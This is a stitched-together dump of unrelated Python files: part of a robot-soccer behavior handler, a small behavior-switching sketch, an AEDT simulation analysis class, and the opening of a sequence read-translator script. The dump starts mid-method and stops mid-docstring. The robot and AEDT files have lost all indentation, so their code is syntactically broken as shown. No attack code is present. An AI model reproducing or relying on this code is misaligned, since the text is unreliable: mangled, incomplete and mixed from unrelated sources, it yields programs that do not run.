stance = self._stance_determinator.determinate()
counter = counter + 1 if stance != Stance.STAND else 0
if counter >= self.fall_indicator_count:
dode = 0
self.__set_behavior(StandingUpBehavior, self._robot, self._pose_handler,
self._pose_switcher, self._stance_determinator, self._walker)
if self._behavior.is_done():
self._behavior.reset()
self._behavior.start()
timer = timer + 1
time.sleep(self.SLEEP_TIME)
continue
if any(isinstance(self._behavior, behavior) for behavior in (StandingUpBehavior, KickBehavior,)):
if not self._behavior.is_done():
timer = timer + 1
time.sleep(self.SLEEP_TIME)
continue
else:
if isinstance(self._behavior, StandingUpBehavior):
self._localization.localization(True)
self.__set_behavior(UnknownBehavior)
if timestamp + 24 < timer or pix == [0.0, 0.0, 0.0]:
reached = False
self._robot.vision.updateFrame()
ball = self._robot.vision.ballDetect()
ball_found = (ball["width"] != 0.0)
if ball_found:
timestamp = timer
pix = self._cam.imagePixelToWorld(ball["x"] + ball["width"]/2, ball["y"], False)
# dode = False
# if not initialized:
# print "go to start"
# if tuc is None or math.hypot(tuc[0], tuc[1]) > 100:
# tuc = self._localization.global_to_local(self._localization.map.start_point.x, self._localization.map.start_point.y)
# self.__set_behavior(WalkBehavior, self._walker)
# self._behavior.smart_go_to(tuc[0], tuc[1], 100)
# self._walker.look_at(500.0, 0.0, 0.0)
# time.sleep(2.0)
# timer += 1
# continue
# else:
# initialized = True
if ball_found:
print "FOUND!!!!!!"
if reached or dode > 0:
fff = False
bdone = self._behavior.is_done()
if ball_found:
if pix[0] > 0.0:
self._walker.look_at(pix[0], pix[1])
if dode == 0:
enemy_point = self._localization.map.enemy_point
gates = self._localization.global_to_local(enemy_point.x, enemy_point.y)
self.__set_behavior(WalkBehavior, self._walker)
if gates[2] > math.radians(30):
self._behavior.go_around(gates[2])
dode = 1
bdone = False
time.sleep(0.2)
else:
dode = 1
bdone = True
if dode == 1 and bdone:
self.__set_behavior(KickBehavior, self._robot, self._pose_handler,
self._pose_switcher, self._stance_determinator, self._walker)
self._behavior.set_left_leg(pix[1] > 0)
aa = self._robot.locomotion.autoapply.enable(False)
self._behavior.start()
dode = 2
bdone = False
time.sleep(0.2)
if dode == 2 and bdone:
dode = 0
time.sleep(0.5)
if dode == 0:
if timestamp == 0 or timestamp + 54 < timer or pix == [0.0, 0.0, 0.0] or pix[0] < 0.0:
self.__set_behavior(WalkBehavior, self._walker)
if not ball_found:
if fff == False:
h_angle = 0.0
low = True
to_left = True
fff = True
print "h_angle", math.degrees(h_angle), to_left, low,
if to_left:
if h_angle == -self.FINDING_SECTOR_ANGLE / 2.0:
low = True
to_left = False
h_angle += self.HEAD_YAW_STEP
else:
h_angle -= self.HEAD_YAW_STEP
else:
if h_angle == self.FINDING_SECTOR_ANGLE / 2.0:
low = False
to_left = True
h_angle -= self.HEAD_YAW_STEP
else:
h_angle += self.HEAD_YAW_STEP
h_y = 0.0
h_x = 300.0 if low else 1000.0
c = math.cos(h_angle)
s = math.sin(h_angle)
h_x, h_y = h_x * c - h_y * s, h_x * s + h_y * c
print "h x, y", h_x, h_y
self._walker.look_at(h_x, h_y, 0.0)
else:
print "!!!"
if pix[0] > 0.0:
self._walker.look_at(pix[0], pix[1])
self._behavior.go_around(math.pi, 0.5)
elif math.hypot(pix[0], pix[1]) > 350.0:
fff = False
# print pix
if pix[0] > 0.0:
self._walker.look_at(pix[0], pix[1])
enemy_point = self._localization.map.enemy_point
gates = self._localization.global_to_local(enemy_point.x, enemy_point.y)
dx = pix[0] - gates[0]
dy = pix[1] - gates[1]
angle = math.atan2(dy, dx)
distance = math.hypot(dx, dy)
new_dist = distance + 180
target = (pix[0] + math.cos(angle) * (new_dist) - dx, pix[1] + math.sin(angle) * (new_dist) - dy)
print "target", target
self.__set_behavior(WalkBehavior, self._walker)
print repr(self._behavior)
self._behavior.smart_go_to(target[0], target[1], 100)
elif pix != [0.0, 0.0, 0.0] and pix[0] > 0.0:
fff = False
reached = True
timer = timer + 1
time.sleep(self.SLEEP_TIME)
# elif t == 20.0:
# self.__set_behavior(KickBehavior, self._robot, self._pose_handler,
# self._pose_switcher, self._stance_determinator, self._walker)
# self._behavior.set_left_leg(left_leg)
# left_leg = not left_leg
def stop(self):
self._iterrupt = True
self._worker.join()
class GoalieBehaviourHandler(BehaviorHandler):
def run(self):
la_coords = [1000.0, 0.0]
step = 100.0
counter = 0
start = time.time()
left_leg = True
self.__set_behavior(UnknownBehavior)
stance = self._stance_determinator.determinate()
if stance == Stance.STAND:
self._pose_handler.set_pose("walking_pose", 2.0)
timer = 0
ball_found = False
ball = {
"x": 0,
"y": 0,
"width": 0,
"height": 0,
}
timestamp = 0
pix = [0.0, 0.0]
reached = False
dode = 0
initialized = False
while not self._iterrupt:
stance = self._stance_determinator.determinate()
counter = counter + 1 if stance != Stance.STAND else 0
if counter >= self.fall_indicator_count:
dode = 0
self.__set_behavior(StandingUpBehavior, self._robot, self._pose_handler,
self._pose_switcher, self._stance_determinator, self._walker)
if self._behavior.is_done():
self._behavior.reset()
timer = timer + 1
time.sleep(self.SLEEP_TIME)
continue
if any(isinstance(self._behavior, behavior) for behavior in (StandingUpBehavior, KickBehavior)):
if not self._behavior.is_done():
timer = timer + 1
time.sleep(self.SLEEP_TIME)
continue
else:
if isinstance(self._behavior, StandingUpBehavior):
self._localization.localization(True)
self.__set_behavior(UnknownBehavior)
self._robot.vision.updateFrame()
ball = self._robot.vision.ballDetect()
ball_found = (ball["width"] != 0.0)
if ball_found:
timestamp = timer
pix = self._cam.imagePixelToWorld(ball["x"] + ball["width"]/2, ball["y"], False)
if timestamp + 8 < timer or pix == [0.0, 0.0, 0.0] or pix[0] < 0.0:
print "finding"
self._robot.locomotion.autoapply.enable(False)
la_coords[1] += step
self._robot.kinematics.lookAt(la_coords[0], la_coords[1], 0.0, False)
if abs(la_coords[1]) >= 1000.0:
step *= -1
self._pose_handler.set_pose("walking_pose", 1.0)
la_coords[1] = 0
elif abs(pix[1]) > 100.0:
print pix
self._robot.locomotion.autoapply.enable(True)
self.__set_behavior(WalkBehavior, self._walker)
self._walker.look_at(pix[0], pix[1])
tmp_p = self._localization.position.point.y + pix[1]
if tmp_p > 1100.0 or tmp_p < -1100.0:
self._behavior.linear_go_to(0.0, math.copysign((1100.0 - abs(tmp_p)), pix[1]), 100.0)
else:
self._behavior.linear_go_to(0.0, pix[1], 100.0)
time.sleep(0.3)
elif math.hypot(pix[0], pix[1]) < 200.0:
self.__set_behavior(KickBehavior, self._robot, self._pose_handler,
self._pose_switcher, self._stance_determinator, self._walker)
self._behavior.set_left_leg(pix[1] > 0)
aa = self._robot.locomotion.autoapply.enable(False)
self._behavior.start()
time.sleep(0.3)
timer = timer + 1
time.sleep(self.SLEEP_TIME)
def __set_behavior(self, behavior, *args, **kwargs):
with self._lock:
if not isinstance(self._behavior, behavior):
self._behavior.stop()
self._behavior = behavior(*args, **kwargs)
|
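A stripped-down sketch of the switching rule BehaviorHandler.__set_behavior implements in behavior.py: keep the current behavior if it is already an instance of the requested class, otherwise stop it and construct the new one under the lock. The classes here are illustrative stand-ins, not the originals.
from threading import Lock
class IdleBehavior(object):
    def run(self): pass
    def stop(self): pass
class BehaviorSwitcher(object):
    def __init__(self):
        self._lock = Lock()
        self._behavior = IdleBehavior()
    def set_behavior(self, behavior_cls, *args, **kwargs):
        with self._lock:
            if not isinstance(self._behavior, behavior_cls):
                self._behavior.stop()  # shut down the behavior being replaced
                self._behavior = behavior_cls(*args, **kwargs)
switcher = BehaviorSwitcher()
switcher.set_behavior(IdleBehavior)  # no-op: already an IdleBehavior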
Analysis.py
|
"""
This module contains the ``Analysis`` class.
It includes common classes for file management and messaging and all
calls to AEDT modules like the modeler, mesh, postprocessing, and setup.
"""
from __future__ import absolute_import
import os
import shutil
import threading
import warnings
from collections import OrderedDict
from .. import is_ironpython
from ..generic.general_methods import aedt_exception_handler
from ..modeler.modeler_constants import CoordinateSystemAxis, CoordinateSystemPlane, GravityDirection, Plane
from ..modules.Boundary import NativeComponentObject
from ..modules.DesignXPloration import (
DOESetups,
DXSetups,
OptimizationSetups,
ParametericsSetups,
SensitivitySetups,
StatisticalSetups,
)
from ..modules.MaterialLib import Materials
from ..modules.SetupTemplates import SetupKeys
from ..modules.SolutionType import SetupTypes, SolutionType
from ..modules.SolveSetup import Setup
from .Design import Design
if is_ironpython:
from ..modules.PostProcessor import PostProcessor
else:
from ..modules.AdvancedPostProcessing import PostProcessor
class Analysis(Design, object):
"""Contains all common analysis functions.
This class is inherited in the caller application and is accessible through it (for example, ``hfss.method_name``).
It is automatically initialized by a call from an application, such as HFSS or Q3D.
See the application function for its parameter descriptions.
Parameters
----------
application : str
Application that is to initialize the call.
projectname : str
Name of the project to select or the full path to the project
or AEDTZ archive to open.
designname : str
Name of the design to select.
solution_type : str
Solution type to apply to the design.
setup_name : str
Name of the setup to use as the nominal.
specified_version : str
Version of AEDT to use.
non_graphical : bool
Whether to run AEDT in non-graphical mode.
new_desktop_session : bool
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine.
close_on_exit : bool
Whether to release AEDT on exit.
student_version : bool
Whether to enable the student version of AEDT.
"""
def __init__(
self,
application,
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
):
self.setups = []
Design.__init__(
self,
application,
projectname,
designname,
solution_type,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
)
self.logger.info("Design Loaded")
self._setup = None
if setup_name:
self.analysis_setup = setup_name
self.solution_type = solution_type
self._materials = Materials(self)
self.logger.info("Materials Loaded")
self._post = PostProcessor(self)
self._available_variations = self.AvailableVariations(self)
self.setups = [self.get_setup(setup_name) for setup_name in self.setup_names]
self.opti_parametric = ParametericsSetups(self)
self.opti_optimization = OptimizationSetups(self)
self.opti_doe = DOESetups(self)
self.opti_designxplorer = DXSetups(self)
self.opti_sensitivity = SensitivitySetups(self)
self.opti_statistical = StatisticalSetups(self)
self.native_components = self._get_native_data()
@property
def materials(self):
"""Manages materials in the project.
Returns
-------
:class:`pyaedt.modules.MaterialLib.Materials`
Manages materials in the project.
"""
return self._materials
@property
def Position(self):
"""Position of the object.
Returns
-------
type
Position object.
"""
return self.modeler.Position
@property
def available_variations(self):
"""Available variation object.
Returns
-------
:class:`pyaedt.application.Analysis.Analysis.AvailableVariations`
Available variation object.
"""
return self._available_variations
@property
def CoordinateSystemAxis(self):
"""Coordinate system axis constant.
Returns
-------
tuple
Coordinate system axis constants tuple (.X, .Y, .Z).
"""
return CoordinateSystemAxis()
@property
def CoordinateSystemPlane(self):
"""Coordinate system plane constants.
Returns
-------
tuple
Coordinate system plane constants tuple (.XY, .YZ, .XZ).
"""
return CoordinateSystemPlane()
@property
def View(self):
"""Planes. (To check if redundant to CoordinateSystemPlane.)
Returns
-------
tuple
Coordinate system plane string tuple ("XY", "YZ", "XZ").
"""
return Plane()
@property
def GravityDirection(self):
"""Gravity direction. (To check if redundant.)
Returns
-------
tuple
Gravity direction tuple (XNeg, YNeg, ZNeg, XPos, YPos, ZPos).
"""
return GravityDirection()
@property
def modeler(self):
"""Modeler.
Returns
-------
:class:`pyaedt.modeler.Modeler.Modeler`
Modeler object.
"""
return self._modeler
@property
def mesh(self):
"""Mesh.
Returns
-------
:class:`pyaedt.modules.Mesh.Mesh`
Mesh object.
"""
return self._mesh
@property
def post(self):
"""PostProcessor.
Returns
-------
:class:`pyaedt.modules.PostProcessor.PostProcessor`
PostProcessor object.
"""
return self._post
@property
def osolution(self):
"""Solution.
Returns
-------
AEDT object
Solution module.
"""
return self.odesign.GetModule("Solutions")
@property
def oanalysis(self):
"""Analysis."""
return self.odesign.GetModule("AnalysisSetup")
@property
def analysis_setup(self):
"""Analysis setup.
Returns
-------
str
Name of the active or first analysis setup.
"""
if self._setup:
return self._setup
elif self.existing_analysis_setups:
return self.existing_analysis_setups[0]
else:
self._setup = None
return self._setup
@analysis_setup.setter
def analysis_setup(self, setup_name):
setup_list = self.existing_analysis_setups
if setup_list:
assert setup_name in setup_list, "Invalid setup name {}".format(setup_name)
self._setup = setup_name
else:
self._setup = setup_list[0]
# return self._setup
@property
def existing_analysis_sweeps(self):
"""Existing analysis sweeps.
Returns
-------
list
List of all analysis sweeps in the design.
"""
setup_list = self.existing_analysis_setups
sweep_list = []
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
sweep_list = self.oanalysis.GetAllSolutionNames()
sweep_list = [i for i in sweep_list if "Adaptive Pass" not in i]
sweep_list.reverse()
else:
for el in setup_list:
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
sweeps = self.oanalysis.GetAllSolutionNames()
elif self.solution_type in SetupKeys.defaultAdaptive.keys():
setuptype = SetupKeys.defaultAdaptive[self.solution_type]
if setuptype:
sweep_list.append(el + " : " + setuptype)
try:
sweeps = list(self.oanalysis.GetSweeps(el))
except:
sweeps = []
for sw in sweeps:
sweep_list.append(el + " : " + sw)
return sweep_list
@property
def nominal_adaptive(self):
"""Nominal adaptive sweep.
Returns
-------
str
Name of the nominal adaptive sweep.
"""
if len(self.existing_analysis_sweeps) > 0:
return self.existing_analysis_sweeps[0]
else:
return ""
@property
def nominal_sweep(self):
"""Nominal sweep.
Returns
-------
str
Name of the last adaptive sweep if a sweep is available or
the name of the nominal adaptive sweep if present.
"""
if len(self.existing_analysis_sweeps) > 1:
return self.existing_analysis_sweeps[1]
else:
return self.nominal_adaptive
@property
def existing_analysis_setups(self):
"""Existing analysis setups.
Returns
-------
list
List of all analysis setups in the design.
"""
setups = list(self.oanalysis.GetSetups())
return setups
@property
def output_variables(self):
"""Output variables.
Returns
-------
list
List of output variables.
"""
oModule = self.odesign.GetModule("OutputVariable")
return oModule.GetOutputVariables()
@property
def setup_names(self):
"""Setup names.
Returns
-------
list
List of names of all analysis setups in the design.
"""
return self.oanalysis.GetSetups()
@property
def ooptimetrics(self):
"""Optimetrics.
Returns
-------
AEDT object
Optimetrics module object.
"""
return self.odesign.GetModule("Optimetrics")
@property
def ooutput_variable(self):
"""Output variable.
Returns
-------
AEDT object
Output variable module object.
"""
return self.odesign.GetModule("OutputVariable")
@property
def SimulationSetupTypes(self):
"""Simulation setup types.
Returns
-------
SetupTypes
List of all simulation setup types categorized by application.
"""
return SetupTypes()
@property
def SolutionTypes(self):
"""Solution types.
Returns
-------
SolutionType
List of all solution type categorized by application.
"""
return SolutionType()
@aedt_exception_handler
def _get_native_data(self):
"""Retrieve Native Components data."""
boundaries = []
try:
data_vals = self.design_properties["ModelSetup"]["GeometryCore"]["GeometryOperations"][
"SubModelDefinitions"
]["NativeComponentDefinition"]
if not isinstance(data_vals, list) and type(data_vals) is OrderedDict:
boundaries.append(
NativeComponentObject(
self,
data_vals["NativeComponentDefinitionProvider"]["Type"],
data_vals["BasicComponentInfo"]["ComponentName"],
data_vals,
)
)
for ds in data_vals:
try:
if type(ds) is OrderedDict:
boundaries.append(
NativeComponentObject(
self,
ds["NativeComponentDefinitionProvider"]["Type"],
ds["BasicComponentInfo"]["ComponentName"],
ds,
)
)
except:
pass
except:
pass
return boundaries
class AvailableVariations(object):
def __init__(self, parent):
"""Contains available variations.
Parameters
----------
parent :
Inherited parent object.
Returns
-------
object
Parent object.
"""
self._parent = parent
@property
def variables(self):
"""Variables.
Returns
-------
list
List of names of independent variables.
"""
return [i for i in self._parent.variable_manager.independent_variables]
@aedt_exception_handler
def variations(self, setup_sweep=None):
"""Variations.
Parameters
----------
setup_sweep : str, optional
Setup name with the sweep to search for variations on. The default is ``None``.
Returns
-------
list
List of variation families.
"""
if not setup_sweep:
setup_sweep = self._parent.existing_analysis_sweeps[0]
vs = self._parent.osolution.GetAvailableVariations(setup_sweep)
families = []
for v in vs:
variations = v.split(" ")
family = []
for el in self.variables:
family.append(el + ":=")
i = 0
while i < len(variations):
if variations[i][0 : len(el)] == el:
family.append([variations[i][len(el) + 2 : -1]])
i += 1
families.append(family)
return families
@property
def nominal(self):
"""Nominal."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["Nominal"])
return families
@property
def nominal_w_values(self):
"""Nominal with values."""
families = []
if self._parent.design_type == "HFSS 3D Layout Design":
listvar = list(self._parent.odesign.GetVariables())
for el in listvar:
families.append(el + ":=")
families.append([self._parent.odesign.GetVariableValue(el)])
else:
variation = self._parent.odesign.GetNominalVariation()
for el in self.variables:
families.append(el + ":=")
families.append([self._parent.odesign.GetVariationVariableValue(variation, el)])
return families
@property
def nominal_w_values_dict(self):
"""Nominal with values in a dictionary."""
families = {}
if self._parent.design_type == "HFSS 3D Layout Design":
listvar = list(self._parent.odesign.GetVariables())
for el in listvar:
families[el] = self._parent.odesign.GetVariableValue(el)
else:
variation = self._parent.odesign.GetNominalVariation()
for el in self.variables:
families[el] = self._parent.odesign.GetVariationVariableValue(variation, el)
return families
@property
def all(self):
"""All."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["All"])
return families
class AxisDir(object):
"""Contains constants for the axis directions."""
(XNeg, YNeg, ZNeg, XPos, YPos, ZPos) = range(0, 6)
@aedt_exception_handler
def get_setups(self):
"""Retrieve setups.
Returns
-------
list
List of names of all setups.
"""
setups = self.oanalysis.GetSetups()
return list(setups)
@aedt_exception_handler
def get_nominal_variation(self):
"""Retrieve the nominal variation.
Returns
-------
list
List of nominal variations.
"""
return self.available_variations.nominal
@aedt_exception_handler
def get_sweeps(self, name):
"""Retrieve all sweep for a setup.
Parameters
----------
name : str
Name of the setup.
Returns
-------
list
List of names of all sweeps for the setup.
"""
sweeps = self.oanalysis.GetSweeps(name)
return list(sweeps)
@aedt_exception_handler
def export_parametric_results(self, sweepname, filename, exportunits=True):
"""Export a list of all parametric variations solved for a sweep to a CSV file.
Parameters
----------
sweepname : str
Name of the optimetrics sweep.
filename : str
Full path and name for the CSV file.
exportunits : bool, optional
Whether to export units with the value. The default is ``True``. When ``False``,
only the value is exported.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
self.ooptimetrics.ExportParametricResults(sweepname, filename, exportunits)
return True
@aedt_exception_handler
def analyze_from_initial_mesh(self):
"""Revert the solution to the initial mesh and re-run the solve.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
self.oanalysis.RevertSetupToInitial(self._setup)
self.analyze_nominal()
return True
@aedt_exception_handler
def analyse_nominal(self):
"""Solve the nominal design.
.. deprecated:: 0.4.0
Use :func:`Analysis.analyze_nominal` instead.
"""
warnings.warn("`analyse_nominal` is deprecated. Use `analyze_nominal` instead.", DeprecationWarning)
self.analyze_nominal()
@aedt_exception_handler
def analyze_nominal(self):
"""Solve the nominal design.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
self.odesign.Analyze(self.analysis_setup)
return True
@aedt_exception_handler
def generate_unique_setup_name(self, setup_name=None):
"""Generate a new setup with an unique name.
Parameters
----------
setup_name : str, optional
Name of the setup. The default is ``None``.
Returns
-------
str
Name of the setup.
"""
if not setup_name:
setup_name = "Setup"
index = 2
while setup_name in self.existing_analysis_setups:
setup_name = setup_name + "_{}".format(index)
index += 1
return setup_name
@aedt_exception_handler
def create_setup(self, setupname="MySetupAuto", setuptype=None, props={}):
"""Create a setup.
Parameters
----------
setupname : str, optional
Name of the setup. The default is ``"MySetupAuto"``.
setuptype : optional
Type of the setup. The default is ``None``, in which case
the default type is applied.
props : dict, optional
Dictionary of analysis properties appropriate for the design and analysis.
If no values are passed, default values will be used.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
Examples
--------
Create a setup for SBR+ setup using advanced Doppler
processing for automotive radar.
>>> import pyaedt
>>> hfss = pyaedt.Hfss(solution_type='SBR+')
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> setup1.props["IsSbrRangeDoppler"] = True
>>> setup1.props["SbrRangeDopplerTimeVariable"] = "time_var"
>>> setup1.props["SbrRangeDopplerCenterFreq"] = "76.5GHz"
>>> setup1.props["SbrRangeDopplerRangeResolution"] = "0.15meter"
>>> setup1.props["SbrRangeDopplerRangePeriod"] = "100meter"
>>> setup1.props["SbrRangeDopplerVelocityResolution"] = "0.2m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMin"] = "-30m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMax"] = "30m_per_sec"
>>> setup1.props["DopplerRayDensityPerWavelength"] = "0.2"
>>> setup1.props["MaxNumberOfBounces"] = "3"
>>> setup1.update()
...
pyaedt Info: Sweep was created correctly.
"""
if setuptype is None:
if self.design_type == "Icepak" and self.solution_type == "Transient":
setuptype = SetupKeys.defaultSetups["TransientTemperatureAndFlow"]
else:
setuptype = SetupKeys.defaultSetups[self.solution_type]
name = self.generate_unique_setup_name(setupname)
setup = Setup(self, setuptype, name)
setup.create()
if props:
for el in props:
setup.props[el] = props[el]
setup.update()
self.analysis_setup = name
self.setups.append(setup)
return setup
@aedt_exception_handler
def delete_setup(self, setupname):
"""Delete a setup.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
Examples
--------
Create a setup and then delete it.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> hfss.delete_setup(setupname='Setup1')
...
pyaedt Info: Sweep was deleted correctly.
"""
if setupname in self.existing_analysis_setups:
self.oanalysis.DeleteSetups([setupname])
for s in self.setups:
if s.name == setupname:
self.setups.remove(s)
return True
return False
@aedt_exception_handler
def edit_setup(self, setupname, properties_dict):
"""Modify a setup.
Parameters
----------
setupname : str
Name of the setup.
properties_dict : dict
Dictionary containing the property to update with the value.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
"""
setuptype = SetupKeys.defaultSetups[self.solution_type]
setup = Setup(self, setuptype, setupname, isnewsetup=False)
setup.update(properties_dict)
self.analysis_setup = setupname
return setup
@aedt_exception_handler
def get_setup(self, setupname):
"""Get the setup from the current design.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
"""
setuptype = SetupKeys.defaultSetups[self.solution_type]
setup = Setup(self, setuptype, setupname, isnewsetup=False)
if setup.props:
self.analysis_setup = setupname
return setup
@aedt_exception_handler
def create_output_variable(self, variable, expression):
"""Create or modify an output variable.
Parameters
----------
variable : str
Name of the variable.
expression :
Value for the variable.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
oModule = self.odesign.GetModule("OutputVariable")
if variable in self.output_variables:
oModule.EditOutputVariable(
variable, expression, variable, self.existing_analysis_sweeps[0], self.solution_type, []
)
else:
oModule.CreateOutputVariable(variable, expression, self.existing_analysis_sweeps[0], self.solution_type, [])
return True
@aedt_exception_handler
def get_output_variable(self, variable, solution_name=None, report_type_name=None):
"""Retrieve the value of the output variable.
Parameters
----------
variable : str
Name of the variable.
solution_name : str, optional
Name of the solution. The default is ``None``.
report_type_name : str, optional
Name of the report type. The default is ``None``.
Returns
-------
type
Value of the output variable.
"""
oModule = self.odesign.GetModule("OutputVariable")
assert variable in self.output_variables, "Output variable {} does not exist.".format(variable)
nominal_variation = self.odesign.GetNominalVariation()
sol_type = self.solution_type
value = oModule.GetOutputVariableValue(
variable, nominal_variation, self.existing_analysis_sweeps[0], self.solution_type, []
)
return value
@aedt_exception_handler
def get_object_material_properties(self, object_list=None, prop_names=None):
"""Retrieve the material properties for a list of given objects and return them in a dictionary.
This high-level function ignores objects with no defined material properties.
Parameters
----------
object_list : list, optional
List of objects for which to get material_properties. The default is ``None``,
in which case all objects are considered.
prop_names : str or list
The property or list of properties to export. The default is ``None``, in
which case all properties are exported.
Returns
-------
dict
Dictionary of objects with material properties.
"""
if object_list:
if not isinstance(object_list, list):
object_list = [object_list]
else:
object_list = self.modeler.primitives.object_names
if prop_names:
if not isinstance(prop_names, list):
prop_names = [prop_names]
dict = {}
for entry in object_list:
mat_name = self.modeler.primitives[entry].material_name
mat_props = self._materials[mat_name]
if prop_names is None:
dict[entry] = mat_props._props
else:
dict[entry] = {}
for prop_name in prop_names:
dict[entry][prop_name] = mat_props._props[prop_name]
return dict
@aedt_exception_handler
def analyze_setup(self, name):
"""Analyze a specific design setup.
Parameters
----------
name : str
Name of the setup, which can be an optimetric setup or a simple setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
if name in self.existing_analysis_setups:
self._messenger.add_info_message("Solving design setup {}".format(name))
self.odesign.Analyze(name)
else:
try:
self._messenger.add_info_message("Solving Optimetrics")
self.ooptimetrics.SolveSetup(name)
except:
self._messenger.add_error_message("Setup Not found {}".format(name))
return False
return True
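    # Usage sketch (illustrative): a previously created setup named "MySetup" could be
    # solved directly with
    #     app.analyze_setup("MySetup")
    # falling back to the optimetrics solver when the name is not a plain analysis setup.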
@aedt_exception_handler
def solve_in_batch(self, filename=None, machine="local", run_in_thread=False):
"""Analyze a design setup in batch mode.
.. note::
To use this function, the AEDT project must be closed.
Parameters
----------
        filename : str, optional
            Full path of the project file to solve. The default is ``None``, which means that
            the active project is to be solved.
machine : str, optional
Name of the machine if remote. The default is ``"local"``.
run_in_thread : bool, optional
Whether the batch command is to be submitted as a thread. The default is
``False``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
if not filename:
filename = self.project_file
self.close_project()
if machine == "local":
# -Monitor option used as workaround for R2 BatchSolve not exiting properly at the end of the Batch job
options = " -ng -BatchSolve -Monitor "
else:
options = " -ng -distribute -machinelist list=" + machine + " -Batchsolve "
self.add_info_message("Batch Solve Options: " + options)
if os.name == "posix":
            batch_run = (
                chr(34) + self.desktop_install_dir + "/ansysedt" + chr(34) + options + chr(34) + filename + chr(34)
            )
else:
batch_run = (
chr(34) + self.desktop_install_dir + "/ansysedt.exe" + chr(34) + options + chr(34) + filename + chr(34)
)
"""
check for existing solution directory and delete if present so we
dont have old .asol files etc
"""
self.add_info_message("Solving model in batch mode on " + machine)
self.add_info_message("Batch Job command:" + batch_run)
if run_in_thread:
def thread_run():
""" """
os.system(batch_run)
x = threading.Thread(target=thread_run)
x.start()
else:
os.system(batch_run)
self.add_info_message("Batch job finished.")
return True
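    # For reference (assumed from the string assembly above): on Windows the resulting
    # batch command has the shape
    #     "<desktop_install_dir>/ansysedt.exe" -ng -BatchSolve -Monitor "<project.aedt>"
    # while the remote variant swaps in -distribute and -machinelist list=<machine>.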
@aedt_exception_handler
def submit_job(
self, clustername, aedt_full_exe_path=None, numnodes=1, numcores=32, wait_for_license=True, setting_file=None
):
"""Submit a job to be solved on a cluster.
Parameters
----------
clustername : str
Name of the cluster to submit the job to.
aedt_full_exe_path : str, optional
Full path to the AEDT executable file. The default is ``None``, in which
case ``"/clustername/AnsysEM/AnsysEM2x.x/Win64/ansysedt.exe"`` is used.
numnodes : int, optional
Number of nodes. The default is ``1``.
numcores : int, optional
Number of cores. The default is ``32``.
wait_for_license : bool, optional
Whether to wait for the license to be validated. The default is ``True``.
setting_file : str, optional
Name of the file to use as a template. The default value is ``None``.
Returns
-------
type
ID of the job.
"""
project_file = self.project_file
project_path = self.project_path
if not aedt_full_exe_path:
version = self.odesktop.GetVersion()[2:6]
if os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Win64\ansysedt.exe".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Win64\\\\ansysedt.exe".format(version)
)
elif os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Linux64\ansysedt".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Linux64\\\\ansysedt".format(version)
)
else:
self._messenger.add_error_message("Aedt Path doesn't exists. Please provide a full path")
return False
else:
if not os.path.exists(aedt_full_exe_path):
self._messenger.add_error_message("Aedt Path doesn't exists. Please provide a full path")
return False
aedt_full_exe_path.replace("\\", "\\\\")
self.close_project()
path_file = os.path.dirname(__file__)
destination_reg = os.path.join(project_path, "Job_settings.areg")
if not setting_file:
setting_file = os.path.join(path_file, "..", "misc", "Job_Settings.areg")
shutil.copy(setting_file, destination_reg)
f1 = open(destination_reg, "w")
with open(setting_file) as f:
lines = f.readlines()
for line in lines:
if "\\ $begin" == line[:8]:
lin = "\\ $begin \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "\\ $end" == line[:6]:
lin = "\\ $end \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "NumCores" in line:
lin = "\\ \\ \\ \\ NumCores={}\\\n".format(numcores)
f1.write(lin)
elif "NumNodes=1" in line:
lin = "\\ \\ \\ \\ NumNodes={}\\\n".format(numnodes)
f1.write(lin)
elif "ProductPath" in line:
lin = "\\ \\ ProductPath =\\'{}\\'\\\n".format(aedt_full_exe_path)
f1.write(lin)
elif "WaitForLicense" in line:
lin = "\\ \\ WaitForLicense={}\\\n".format(str(wait_for_license).lower())
f1.write(lin)
else:
f1.write(line)
f1.close()
return self.odesktop.SubmitJob(os.path.join(project_path, "Job_settings.areg"), project_file)
|
read_translator.py
|
#!/usr/bin/env python3
import Bio, sys, multiprocessing, subprocess
from multiprocessing import Process
from Bio import SeqIO
from datetime import datetime
startTime = datetime.now()
fastq = "$fastq"
def write_record(record_id, orfseq, output_file, translation_num, orientation):
"""
This function writes a record to the output file.
:param record_id:
:param orfseq:
:param output_file:
:param translation_num:
:param orientation:
:return:
"""
output_line = ''.join(['>', record_id, '_%s_'%orientation, str(translation_num), '\\n', orfseq, '\\n', '\\n'])
output_file.write(output_line)
def process_subfile(subinput_name, suboutput_name):
"""
Loop through the read file supplied as an argument.
    For each read, translate in all 6 possible reading frames and break up
    into ORFs. For all ORFs with lengths greater than 30 aa,
write to the query file that we will search the HMMs against in the
next step.
:param subinput_name:
